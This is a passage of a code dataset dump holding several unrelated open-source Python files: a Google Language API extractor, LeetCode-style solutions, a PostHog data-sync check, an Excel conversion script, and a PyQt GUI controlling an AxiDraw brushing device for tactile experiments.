'UTF32'\n }\n\n return request\n\n def _extract(self, stim):\n request = self._build_request(stim)\n response = self._query_api(request)\n return ExtractorResult(response, stim, self)\n\n def _get_span(self, text_json):\n offset = text_json['text']['beginOffset']\n content = text_json['text']['content']\n return { 'begin_char_index' : offset,\n 'end_char_index' : offset + len(content),\n 'text' : content }\n\n def _to_df(self, result):\n response = result._data\n data = []\n\n # One row/object for all document-level features\n document_data = {}\n\n if 'extractDocumentSentiment' in self.features:\n sentiment = response['documentSentiment']\n document_data.update(flatten_dict(sentiment, 'sentiment'))\n\n # Sentence level sentiment\n for sentence in response.get('sentences', []):\n sentence_data = self._get_span(sentence)\n sentiment = sentence['sentiment']\n sentence_data.update(flatten_dict(sentiment, 'sentiment'))\n data.append(sentence_data)\n\n for category in response.get('categories'):\n key = 'category_%s' % category['name']\n document_data[key] = category['confidence']\n\n # Include only if there are document-level features\n if document_data:\n data.append(document_data)\n\n # Entity-level features\n for entity in response.get('entities', []):\n entity_copy = entity.copy()\n mentions = entity_copy.pop('mentions', [])\n entity_copy.pop('name', None)\n entity_copy = flatten_dict(entity_copy)\n\n for m in mentions:\n entity_data = self._get_span(m)\n entity_data.update(entity_copy)\n # Overwrite top-level sentiment with mention-level\n sentiment = m.get('sentiment', {})\n entity_data.update(flatten_dict(sentiment, 'sentiment'))\n data.append(entity_data)\n\n # Token-level syntax features\n for token in response.get('tokens', []):\n token_data = self._get_span(token)\n token_data['lemma'] = token['lemma']\n token_data.update(token['partOfSpeech'])\n dependency = flatten_dict(token['dependencyEdge'], 'dependency')\n token_data.update(dependency)\n data.append(token_data)\n\n df = pd.DataFrame(data)\n df['language'] = 
response['language']\n return df\n\n\nclass GoogleLanguageAPIEntityExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts entity labels in text using the Google Language API '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractEntities'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPISentimentExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts sentiment of text using the Google Language API '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractDocumentSentiment'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPISyntaxExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts syntax properties of text using the Google Language API '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractSyntax'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPITextCategoryExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts document category using the Google Language API.\n See the API documentation for the taxonomy of categories:\n https://cloud.google.com/natural-language/docs/categories '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['classifyText'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPIEntitySentimentExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts sentiment of entities found in text using the Google Language\n API. Produces identical results to the entity extractor but with additional\n sentiment analysis. '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractEntitySentiment'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n","repo_name":"PsychoinformaticsLab/pliers","sub_path":"pliers/extractors/api/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":26007,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"53"}
+{"seq_id":"23915777194","text":"\"\"\"\nLeetcode #108 Convert Sorted Array to Binary Search Tree\n\nGiven an integer array nums where the elements are \nsorted in ascending order, convert it to a height-balanced \nbinary search tree.\n\nA height-balanced binary tree is a binary tree in which the \ndepth of the two subtrees of every node never differs by \nmore than one.\n\nExample 1:\nInput: nums = [-10,-3,0,5,9]\nOutput: [0,-3,9,-10,null,5]\nExplanation: [0,-10,5,null,-3,null,9] is also accepted:\n\nExample 2:\nInput: nums = [1,3]\nOutput: [3,1]\nExplanation: [1,null,3] and [3,1] are both height-balanced BSTs.\n\nConstraints:\n1 <= nums.length <= 104\n-104 <= nums[i] <= 104\nnums is sorted in a strictly increasing order.\n\nAlgorithm/DS used: Binary search using midpoint for creating a \nnode and stack for traversal\n\nO(N) worst case time where N is the length of nums\n\nO(N) worst case space where N is the length of nums\n\n\"\"\"\nfrom typing import List\nfrom typing import Tuple\nfrom collections import deque\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def _createNodeFromMidpoint(self, nums: List[int]) -> Tuple[TreeNode, List, List]:\n if not nums:\n return (None, [], [])\n m = len(nums) // 2\n return (TreeNode(val=nums[m]), nums[:m], nums[m+1:])\n\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n if not nums:\n return None\n m = len(nums) // 2\n root = TreeNode(val=nums[m])\n s = [(root, nums[:m], nums[m+1:])]\n while s:\n current = s.pop()\n left = self._createNodeFromMidpoint(current[1])\n right = self._createNodeFromMidpoint(current[2])\n current[0].left = left[0]\n current[0].right = right[0]\n if left[0]:\n s.append(left)\n if right[0]:\n s.append(right)\n return root\n\n\ndef breadth_first_traverse(root: TreeNode) -> List:\n result = []\n q = deque()\n q.append(root)\n while q:\n current = q.popleft()\n if not current:\n result.append(current)\n elif current:\n result.append(current.val)\n if current.left or current.right:\n q.append(current.left)\n q.append(current.right)\n return result\n\n\ndef test_solution():\n s = Solution()\n print(\"Expected result from input [-10,-3,0,5,9] is [0,-3,9,-10,None,5, None] and the Actual result is: \" +\n str(breadth_first_traverse(s.sortedArrayToBST([-10, -3, 0, 5, 9]))))\n assert breadth_first_traverse(s.sortedArrayToBST(\n [-10, -3, 0, 5, 9])) == [0, -3, 9, -10, None, 5, None]\n assert breadth_first_traverse(s.sortedArrayToBST(\n [1, 3])) == [3, 1, None]\n\n # Insert more tests here...\n\n\nif __name__ == \"__main__\":\n test_solution()\n","repo_name":"JacksonJW/practice-problems-interview-prep","sub_path":"leetcode/python3/convert_sorted_array_to_binary_search_tree.py","file_name":"convert_sorted_array_to_binary_search_tree.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33280821155","text":"# O(n) time | O(1) space - where n is the length of the input ar\r\n\r\ndef hasSingleCycle(array):\r\n\tnumElementsVisited = 0\r\n\tcurrentIdx = 0\r\n\twhile numElementsVisited < len(array):\r\n\t\tif numElementsVisited > 0 and currentIdx == 0:\r\n\t\t\treturn False\r\n\t\tnumElementsVisited += 1\r\n\t\tcurrentIdx = getNextIdx(currentIdx, array)\r\n\treturn currentIdx == 0\r\n\r\ndef getNextIdx(currentIdx, array):\r\n\tjump = array[currentIdx]\r\n\tnextIdx = (currentIdx + jump) % len(array)\r\n\treturn nextIdx if nextIdx >= 0 else nextIdx + len(array)","repo_name":"Abhishek-Rout/Competitive-Coding","sub_path":"AlgoExpert/2. Medium/Python/Single Cycle Check/Single Cycle Check.py","file_name":"Single Cycle Check.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"}
+{"seq_id":"39513457049","text":"import json\nfrom collections import Counter, defaultdict\nfrom datetime import timedelta\nfrom typing import Any, Dict, List\n\nimport structlog\nfrom django.db.models.query import Prefetch\nfrom django.utils.timezone import now\n\nfrom posthog.celery import app\nfrom posthog.client import sync_execute\nfrom posthog.models.person import Person\n\nlogger = structlog.get_logger(__name__)\n\n# We check up to LIMIT persons between PERIOD_START..PERIOD_END, in batches of BATCH_SIZE\n# This helps keep the metric \"moving\" as we ship fixes or bugs.\nLIMIT = 100000\nBATCH_SIZE = 500\nPERIOD_START = timedelta(hours=1)\nPERIOD_END = timedelta(days=2)\n\nGET_PERSON_CH_QUERY = \"\"\"\nSELECT id, version, properties FROM person JOIN (\n SELECT id, max(version) as version, max(is_deleted) as is_deleted, team_id\n FROM person\n WHERE team_id IN %(team_ids)s AND id IN (%(person_ids)s)\n GROUP BY team_id, id\n) as person_max ON person.id = person_max.id AND person.version = person_max.version AND person.team_id = person_max.team_id\nWHERE team_id IN %(team_ids)s\n AND person_max.is_deleted = 0\n AND id IN (%(person_ids)s)\n\"\"\"\n\nGET_DISTINCT_IDS_CH_QUERY = \"\"\"\nSELECT distinct_id, argMax(person_id, version) as person_id\nFROM person_distinct_id2\nWHERE team_id IN %(team_ids)s\nGROUP BY team_id, distinct_id\nHAVING argMax(is_deleted, version) = 0 AND person_id IN (%(person_ids)s)\n\"\"\"\n\n\n@app.task(max_retries=1, ignore_result=True)\ndef verify_persons_data_in_sync(\n period_start: timedelta = PERIOD_START,\n period_end: timedelta = PERIOD_END,\n limit: int = LIMIT,\n emit_results: bool = True,\n) -> Counter:\n # :KLUDGE: Rather than filter on created_at directly which is unindexed, we look up the latest value in 'id' column\n # and leverage that to narrow down filtering in an index-efficient way\n max_pk = Person.objects.filter(created_at__lte=now() - period_start).latest(\"id\").id\n person_data = list(\n Person.objects.filter(\n pk__lte=max_pk,\n pk__gte=max_pk - LIMIT * 5,\n created_at__gte=now() - period_end,\n ).values_list(\"id\", \"uuid\", \"team_id\")[:limit]\n )\n person_data.sort(key=lambda row: row[2]) # keep persons from same team together\n\n results = Counter(\n {\n \"total\": 0,\n \"missing_in_clickhouse\": 0,\n \"version_mismatch\": 0,\n \"properties_mismatch\": 0,\n \"distinct_ids_mismatch\": 0,\n \"properties_mismatch_same_version\": 0,\n }\n )\n for i in range(0, len(person_data), BATCH_SIZE):\n batch = person_data[i : i + BATCH_SIZE]\n results += _team_integrity_statistics(batch)\n\n if emit_results:\n _emit_metrics(results)\n\n return results\n\n\ndef _team_integrity_statistics(person_data: List[Any]) -> Counter:\n person_ids = [id for id, _, _ in person_data]\n person_uuids = [uuid for _, uuid, _ in person_data]\n team_ids = list(set(team_id for _, _, team_id in person_data))\n\n # :TRICKY: To speed up processing, we fetch all models in batch at once and store results in dictionary indexed by person uuid\n pg_persons = _index_by(\n list(\n Person.objects.filter(id__in=person_ids).prefetch_related(\n Prefetch(\"persondistinctid_set\", to_attr=\"distinct_ids_cache\")\n )\n ),\n lambda p: p.uuid,\n )\n\n ch_persons = _index_by(\n sync_execute(GET_PERSON_CH_QUERY, {\"person_ids\": person_uuids, \"team_ids\": team_ids}),\n lambda row: row[0],\n )\n\n ch_distinct_ids_mapping = _index_by(\n sync_execute(\n GET_DISTINCT_IDS_CH_QUERY,\n {\"person_ids\": person_uuids, \"team_ids\": team_ids},\n ),\n lambda row: row[1],\n flat=False,\n )\n\n result: 
Counter = Counter()\n for _pk, uuid, team_id in person_data:\n # Person was deleted in the middle of processing, can ignore\n if uuid not in pg_persons:\n continue\n result[\"total\"] += 1\n pg_person = pg_persons[uuid]\n if uuid not in ch_persons:\n result[\"missing_in_clickhouse\"] += 1\n logger.info(\"Found person missing in clickhouse\", team_id=team_id, uuid=uuid)\n continue\n _, ch_version, ch_properties = ch_persons[uuid]\n ch_properties = json.loads(ch_properties)\n if ch_version != pg_person.version:\n result[\"version_mismatch\"] += 1\n logger.info(\n \"Found version mismatch\",\n team_id=team_id,\n uuid=uuid,\n properties=pg_person.properties,\n ch_properties=ch_properties,\n )\n if pg_person.properties != ch_properties:\n result[\"properties_mismatch\"] += 1\n logger.info(\n \"Found properties mismatch\",\n team_id=team_id,\n uuid=uuid,\n properties=pg_person.properties,\n ch_properties=ch_properties,\n )\n\n # :KLUDGE: Verify business logic. If versions are in sync so should properties be.\n if ch_version != 0 and ch_version == pg_person.version and pg_person.properties != ch_properties:\n result[\"properties_mismatch_same_version\"] += 1\n\n pg_distinct_ids = list(sorted(map(str, pg_person.distinct_ids)))\n ch_distinct_id = list(sorted(str(distinct_id) for distinct_id, _ in ch_distinct_ids_mapping.get(uuid, [])))\n if pg_distinct_ids != ch_distinct_id:\n result[\"distinct_ids_mismatch\"] += 1\n return result\n\n\ndef _emit_metrics(integrity_results: Counter) -> None:\n from statshog.defaults.django import statsd\n\n for key, value in integrity_results.items():\n statsd.gauge(f\"posthog_person_integrity_{key}\", value)\n\n\ndef _index_by(collection: List[Any], key_fn: Any, flat: bool = True) -> Dict:\n result: Dict = {} if flat else defaultdict(list)\n for item in collection:\n if flat:\n result[key_fn(item)] = item\n else:\n result[key_fn(item)].append(item)\n return result\n","repo_name":"PostHog/posthog","sub_path":"posthog/tasks/verify_persons_data_in_sync.py","file_name":"verify_persons_data_in_sync.py","file_ext":"py","file_size_in_byte":6017,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"}
+{"seq_id":"70506573929","text":"# Created by \"EdgardoCS\" at 22-Aug-23\n__github__ = \"https://github.com/EdgardoCS\"\n__email__ = \"edgardo.silva@uv.cl\"\n\nimport os\nimport sys\nimport time\nimport queue\nimport random\nimport traceback\nimport threading\nimport screeninfo\nimport numpy as np\nimport pandas as pd\nfrom axidraw import brush\n\nfrom PyQt6.QtCore import *\nfrom PyQt6 import QtWidgets\nfrom PyQt6.uic import loadUi\nfrom PyQt6.QtGui import QScreen\nfrom PyQt6.QtWidgets import QMainWindow, QApplication, QInputDialog, QFileDialog, QWidget\n\n\nclass WorkerSignals(QObject):\n \"\"\"\n Defines the signals available from a running worker thread.\n Supported signals are:\n finished\n No data\n error\n tuple (exctype, value, traceback.format_exc() )\n result\n object data returned from processing, anything\n progress\n int indicating % progress\n \"\"\"\n finished = pyqtSignal()\n error = pyqtSignal(tuple)\n result = pyqtSignal(object)\n progress = pyqtSignal(int)\n\n\nclass vasWorker(QRunnable):\n def __init__(self, fn, *args, **kwargs):\n super(vasWorker, self).__init__()\n # Store constructor arguments (re-used for processing)\n self.fn = fn\n self.args = args\n self.kwargs = kwargs\n self.signals = WorkerSignals()\n\n # Add the callback to our kwargs\n self.kwargs['progress_callback'] = self.signals.progress\n\n @pyqtSlot()\n def run(self):\n \"\"\"\n Initialise the runner function with passed args, kwargs.\n \"\"\"\n try:\n result = self.fn(*self.args, **self.kwargs)\n except:\n traceback.print_exc()\n exctype, value = sys.exc_info()[:2]\n self.signals.error.emit((exctype, value, traceback.format_exc()))\n else:\n self.signals.result.emit(result) # Return the result of the processing\n finally:\n self.signals.finished.emit() # Done\n\n\nclass Worker(QRunnable):\n \"\"\"\n Worker thread\n Inherits from QRunnable to handler worker thread setup, signals and wrap-up.\n\n :param callback: The function callback to run on this worker thread. 
Supplied args and\n kwargs will be passed through to the runner.\n :type callback: function\n :param args: Arguments to pass to the callback function\n :param kwargs: Keywords to pass to the callback function\n \"\"\"\n\n def __init__(self, fn, *args, **kwargs):\n super(Worker, self).__init__()\n # Store constructor arguments (re-used for processing)\n self.fn = fn\n self.args = args\n self.kwargs = kwargs\n self.signals = WorkerSignals()\n\n # Add the callback to our kwargs\n self.kwargs['progress_callback'] = self.signals.progress\n\n @pyqtSlot()\n def run(self):\n \"\"\"\n Initialise the runner function with passed args, kwargs.\n \"\"\"\n # Retrieve args/kwargs here; and fire processing using them\n try:\n result = self.fn(*self.args, **self.kwargs)\n except:\n traceback.print_exc()\n exctype, value = sys.exc_info()[:2]\n self.signals.error.emit((exctype, value, traceback.format_exc()))\n else:\n self.signals.result.emit(result) # Return the result of the processing\n finally:\n self.signals.finished.emit() # Done\n\n\nclass AxiDraw(threading.Thread):\n \"\"\"\n AxiDraw main thread\n Set of functions to communicate with axidraw device, can manipulate port (open, close) and send\n signals to initialize movement(move_x, move_y, pen_up, pen_down.\n \"\"\"\n\n def __init__(self, q_in, q_out):\n threading.Thread.__init__(self)\n self.serial_port = None\n self.running = True\n self.serial_status = False\n self.running = True\n self.q_in = q_in\n self.q_out = q_out\n\n def stop(self):\n self.running = False\n # Here we need to close the serial port!\n print('Axidraw thread stopped')\n\n def run(self):\n while self.running:\n msg = self.q_in.get()\n if msg == 'open_port':\n port = brush.findPort() # Success!! Axidraw founded in COMPort\n if port:\n self.serial_port, self.serial_status = brush.openPort(port)\n if self.serial_port:\n if self.serial_status:\n self.q_out.put(self.serial_port.name, self.serial_status)\n # return self.serial_port.name\n else:\n self.q_out.put(self.serial_port.name)\n # return self.serial_port.name\n else:\n print('Could not find a port with an AxiDraw connected')\n self.q_out.put('not-OK')\n else:\n print('Could not find a port with an AxiDraw connected')\n self.q_out.put('not-OK')\n\n if msg == 'close_port':\n port = brush.findPort()\n if port is None:\n print('Could not find a port with an AxiDraw connected')\n else:\n print('Closing port', port)\n self.serial_port = brush.closePort(port)\n\n if msg[0] == 'hellofriend.mov':\n brush.sendEnableMotors(self.serial_port, 2)\n speed = msg[1]\n direction = msg[2]\n distance = msg[3]\n # print('Brushing at ' + str(speed) + ' cm/s')\n if direction == 'Left to Right':\n brush.pen_down(self.serial_port)\n brush.move_x(self.serial_port, distance, speed)\n brush.pen_up(self.serial_port)\n brush.move_x(self.serial_port, -distance, 3)\n elif direction == 'Right to Left':\n brush.pen_down(self.serial_port)\n brush.move_x(self.serial_port, -distance, 3)\n brush.pen_up(self.serial_port)\n brush.move_x(self.serial_port, distance, speed)\n\n # circular movement\n elif direction == 'CW':\n brush.pen_down(self.serial_port)\n brush.move_circular(self.serial_port, speed, 0.67, 1, direction)\n brush.pen_up(self.serial_port)\n elif direction == 'ACW':\n brush.pen_down(self.serial_port)\n brush.move_circular(self.serial_port, speed, 0.67, 1, direction)\n brush.pen_up(self.serial_port)\n\n brush.sendDisableMotors(self.serial_port)\n self.q_out.put('OK')\n\n\n# Queue params:\nq_to_ad = queue.Queue()\nq_from_ad = queue.Queue()\naxidraw = 
AxiDraw(q_to_ad, q_from_ad)\n\naxidraw.daemon = True\naxidraw.start()\n\nWorker.daemon = True\n\n\nclass secondWindow(QMainWindow):\n # VAS UI\n def __init__(self, parent=None):\n super(secondWindow, self).__init__()\n loadUi(\"gui/vas.ui\", self)\n\n self.vasSlider.valueChanged.connect(self.updateDisplay)\n self.vasSubmit.clicked.connect(self.getValues)\n\n def getValues(self):\n # Get values from Slider and print results in console\n # TODO: Store data and export (if exists: append to csv)\n print(self.vasSlider.value())\n # print(q_to_ad.put(['hellofriend.mov', trial, direction, distance])) #EXPORT\n\n self.close()\n\n def updateDisplay(self):\n # Update digital display as the sliders moves\n self.vasCurrent.display(self.vasSlider.value())\n\n\nclass MainUI(QMainWindow):\n # Main UI\n def __init__(self):\n super(MainUI, self).__init__()\n loadUi(\"gui/mainGui.ui\", self)\n\n # Threading neccesary for worker (another thread used in for loop during stimulation\n self.threadpool = QThreadPool()\n\n self.statusBar.showMessage('Ready')\n\n # bind buttons to functions\n self.loadExperiment.triggered.connect(self.loadExperimentAction)\n self.saveExperiment.triggered.connect(self.saveExperimentAction)\n self.loadSubject.triggered.connect(self.loadSubjectAction)\n self.saveSubject.triggered.connect(self.saveSubjectAction)\n self.ResetButton.clicked.connect(self.resetSubject)\n self.BeginButton.clicked.connect(self.startExperiment)\n self.ConnectButton.clicked.connect(self.connectDevice)\n self.actionExit.triggered.connect(QtWidgets.QApplication.quit)\n self.clearButton.clicked.connect(self.clearAction)\n self.clearConsole.clicked.connect(self.clearConsoleAction)\n\n def printToConsole(self, text):\n \"\"\"\n Print functions output into UI console (PlainText)\n :param self:\n :param text: text(str)\n \"\"\"\n\n self.ConsoleOutput.appendPlainText('- ' + text)\n self.ConsoleOutput.ensureCursorVisible()\n\n def loadExperimentAction(self):\n # load a experiment file\n filename = QFileDialog.getOpenFileName(self,\n caption=\"Open Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\"\n )\n\n if filename[0] == \"\":\n return\n data = pd.read_csv(filename[0], header=None)\n self.updateExperiment(data)\n\n def updateExperiment(self, data):\n \"\"\"\n Update experiment UI with loaded data\n :param self:\n :param data: incoming data from LoadExperimentAction function, python list\n \"\"\"\n self.movementPath.setCurrentText(data[1][0])\n self.bodySite.setCurrentText(data[1][1])\n self.movementDirection.setCurrentText(data[1][2])\n self.velocitiesInput.setText(data[1][3])\n self.distanceInput.setText(data[1][4])\n self.repetitionsInput.setText(data[1][5])\n self.intertrialIntput.setText(data[1][6])\n self.vastimeInput.setText(data[1][7])\n\n def saveExperimentAction(self):\n # save a experiment file\n data = [self.movementPath.currentText(),\n self.bodySite.currentText(),\n self.movementDirection.currentText(),\n self.velocitiesInput.displayText(),\n self.distanceInput.displayText(),\n self.repetitionsInput.displayText(),\n self.intertrialIntput.displayText(),\n self.vastimeInput.displayText()]\n\n self.printToConsole('Saving data')\n filename = QFileDialog.getSaveFileName(\n caption=\"Save Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\",\n initialFilter=\"csv\"\n )\n\n if filename[0] == \"\":\n return\n\n indexRow = [\"Path\", \"Site\",\n \"Movement\", \"Velocity\",\n \"Distance\", \"Repetitions\",\n \"VasTime\", \"InterTime\"]\n dataToCsv = pd.DataFrame(data, 
index=indexRow)\n dataToCsv.to_csv(str(filename[0]), header=False)\n\n def loadSubjectAction(self):\n # load a subject file\n filename = QFileDialog.getOpenFileName(self,\n caption=\"Open Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\"\n )\n\n if filename[0] == \"\":\n return\n\n data = pd.read_csv(filename[0], header=None)\n self.updateSubject(data)\n\n def saveSubjectAction(self):\n # save a subject file\n data = [self.subjectInput.displayText(),\n self.ageInput.displayText(),\n self.genderInput.currentText(),\n self.handInput.currentText()]\n\n self.printToConsole('Saving data')\n filename = QFileDialog.getSaveFileName(\n caption=\"Save Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\",\n initialFilter=\"csv\"\n )\n\n if filename[0] == \"\":\n return\n\n indexRow = [\"Subject\", \"Age\",\n \"Gender\", \"Handeness\"]\n dataToCsv = pd.DataFrame(data, index=indexRow)\n dataToCsv.to_csv(str(filename[0]), header=False)\n\n def updateSubject(self, data):\n self.subjectInput.setText(data[1][0])\n self.ageInput.setText(data[1][1])\n self.genderInput.setCurrentText(data[1][2])\n self.handInput.setCurrentText(data[1][3])\n\n def resetSubject(self):\n self.subjectInput.setText(\"\")\n self.ageInput.setText(\"\")\n self.genderInput.setCurrentIndex(0)\n self.handInput.setCurrentIndex(0)\n\n def clearAction(self):\n self.movementPath.setCurrentIndex(0)\n self.bodySite.setCurrentIndex(0)\n self.movementDirection.setCurrentIndex(0)\n self.velocitiesInput.setText(\"\")\n self.distanceInput.setText(\"\")\n self.repetitionsInput.setText(\"\")\n self.intertrialIntput.setText(\"\")\n self.vastimeInput.setText(\"\")\n\n def clearConsoleAction(self):\n self.ConsoleOutput.clear()\n\n def connectDevice(self):\n q_to_ad.put('open_port')\n answer = q_from_ad.get()\n if answer[:3] == 'COM':\n # print(answer)\n # TODO: read all incoming PORTs more elegantly\n\n self.connectedBox.setCheckable(True)\n self.connectedBox.setChecked(True)\n\n self.poweredBox.setCheckable(True)\n self.poweredBox.setChecked(True)\n\n self.ConnectButton.setEnabled(False)\n\n self.connectedBox.setEnabled(False)\n self.poweredBox.setEnabled(False)\n\n def execute_brushing(self, progress_callback):\n \"\"\"\n new Thread! 
Execute trials and send signals to brush through Queue\n :param self\n :param progress_callback: Real-time feedback from worker\n \"\"\"\n self.BeginButton.setEnabled(False)\n trialsRnd = []\n data = self.getExperimentData()\n\n direction = data[2]\n trials = data[3].split(\";\")\n distance = int(data[4])\n reps = int(data[5])\n interTime = int(data[6])\n VasTime = int(data[7])\n\n totalTrials = len(trials) * reps\n trialCount = 1\n\n trials = [eval(i) for i in trials]\n\n for i in range(0, reps):\n trialsRnd.append(random.sample(trials, len(trials)))\n for cycle in trialsRnd:\n for trial in cycle:\n answer = None\n self.printToConsole('Brushing at ' + str(trial) + ' cm/s')\n # add from here to csv, combine with vas results?\n q_to_ad.put(['hellofriend.mov', trial, direction, distance])\n answer = q_from_ad.get()\n progress_callback.emit(totalTrials - trialCount)\n trialCount += 1\n \"\"\"\n flag1 = time.time()\n flag2 = time.time()\n \n while trialCount < totalTrials:\n if flag2 - flag1 >= VasTime:\n flag1 = flag2\n flag2 = time.time()\n trialCount += 1\n else:\n flag2 = time.time()\n else:\n \"\"\"\n time.sleep(interTime)\n self.BeginButton.setEnabled(True)\n return 'Done'\n\n def newWindow(self):\n self.w = secondWindow()\n self.w.show()\n\n def print_output(self, s):\n if s:\n print(s)\n\n def thread_complete(self):\n self.printToConsole(\"Tactile stimulation complete\")\n\n def progress_fn(self, n):\n self.printToConsole('Trials left: ' + str(n))\n self.newWindow()\n\n def startExperiment(self):\n if self.ConnectButton.isEnabled():\n self.printToConsole('MultiTAC is not connected, please connect')\n else:\n worker = Worker(self.execute_brushing)\n worker.signals.result.connect(self.print_output)\n worker.signals.finished.connect(self.thread_complete)\n worker.signals.progress.connect(self.progress_fn)\n # Execute\n self.threadpool.start(worker)\n\n def getExperimentData(self):\n # self.printToConsole('Starting Experiment')\n data = [self.movementPath.currentText(),\n self.bodySite.currentText(),\n self.movementDirection.currentText(),\n self.velocitiesInput.displayText(),\n self.distanceInput.displayText(),\n self.repetitionsInput.displayText(),\n self.intertrialIntput.displayText(),\n self.vastimeInput.displayText()]\n return data\n\n\nif __name__:\n debugger = True\n\n if debugger:\n app = QApplication(sys.argv)\n qt_app = MainUI()\n qt_app.show()\n app.exec()\n","repo_name":"EdgardoCS/BrushGui","sub_path":"MultiTAC.py","file_name":"MultiTAC.py","file_ext":"py","file_size_in_byte":16898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"2234729535","text":"from openpyxl import Workbook\r\nimport string\r\nimport os\r\n\r\nfile_name = []\r\nfolder = \"C:/Users/Turi/PycharmProjects/test\"\r\nfor file in os.listdir(folder):\r\n if file.endswith(\".txt\"):\r\n file_name.append(file)\r\n\r\n\r\nworkbook = Workbook()\r\nfor i in file_name:\r\n workbook.create_sheet(i)\r\n\r\nabc = string.ascii_uppercase\r\n\r\nfor txt_file in file_name:\r\n row = 1\r\n column = 0\r\n header = True\r\n sheet = workbook[txt_file]\r\n with open(txt_file, \"r\") as file:\r\n lines = file.readlines()\r\n for line in lines:\r\n line = line.split('|')\r\n if len(line) > 20 and line[1].startswith(\"P\") and header:\r\n for header_data in line:\r\n cell = abc[column] + str(row)\r\n sheet[cell] = header_data\r\n column += 1\r\n header = False\r\n row += 1\r\n if len(line) > 20 and line[1].startswith(\"3\"):\r\n column = 0\r\n for data in line:\r\n cell = abc[column] + str(row)\r\n sheet[cell] = data\r\n column += 1\r\n column = 0\r\n row += 1\r\n\r\nworkbook.save(filename=\"bence.xlsx\")\r\n\r\n","repo_name":"TurcsanyAdam/Bence_excell","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"32335044162","text":"for _ in range(int(input())):\r\n coin = sorted(list(map(int, input().split()))[1:])\r\n flag = True\r\n\r\n for i in range(1, len(coin)):\r\n if coin[i - 1] * 2 > coin[i]:\r\n flag = False\r\n break\r\n\r\n print(f\"Denominations: \" + \" \".join(map(str, coin)))\r\n print(\"Good coin denominations!\" if flag else \"Bad coin denominations!\")\r\n print()","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Bronze/26350.py","file_name":"26350.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33130369456","text":"import numpy as np\n\nfrom ..bayes_opt import BayesianOptimization\nfrom ..bayes_opt.helpers import acq_max, UtilityFunction\nfrom random import random\nfrom sklearn.preprocessing import StandardScaler\nfrom ..other import random_sample\nimport datetime\n\ndef noop(*kargs, **kwargs):\n # stub function for bo\n return None\n\n\nclass BayesianOptimizer():\n def __init__(self, space, conf={}):\n conf = {\n **conf,\n 'pbounds': space, #conf bounds\n }\n self.space = space\n self.conf = conf\n#########conf contains acq, use; else use default\n self.acq = conf.get('acq', 'ei')\n self.kappa = conf.get('kappa', 2.576)\n self.xi = conf.get('xi', 0.0)\n self.history_data=np.loadtxt('memory_km/datasetforGP.txt')\n self.history_data_y=np.loadtxt('memory_km/dataset.txt')\n self.xx=self.history_data[:]\n self.yy=-self.history_data_y[:,32] # -y\n print('space=',self.space)\n x=self.xx[:1480,:] # wc 1310 pr 1225\n # print(x)\n # StandardScaler= x-mean/var normal\n standardscaler = StandardScaler()\n self.scaler=standardscaler.fit(x)\n x = self.scaler.transform(x)\n\n # print(x)\n\n try:\n del conf['acq'], conf['kappa'], conf['xi']\n except:\n pass\n #print(self.space)\n self.bo = BayesianOptimization(**self._make_config(conf))\n starttime1 = datetime.datetime.now()\n\n self.bo.gp.fit(x, self.yy)\n endtime1 = datetime.datetime.now()\n duringtime1 = endtime1 - starttime1\n\n print('GP model trained..time',duringtime1)\n # print('show make config:')\n # print(self._make_config(conf))\n\n def _make_config(self, 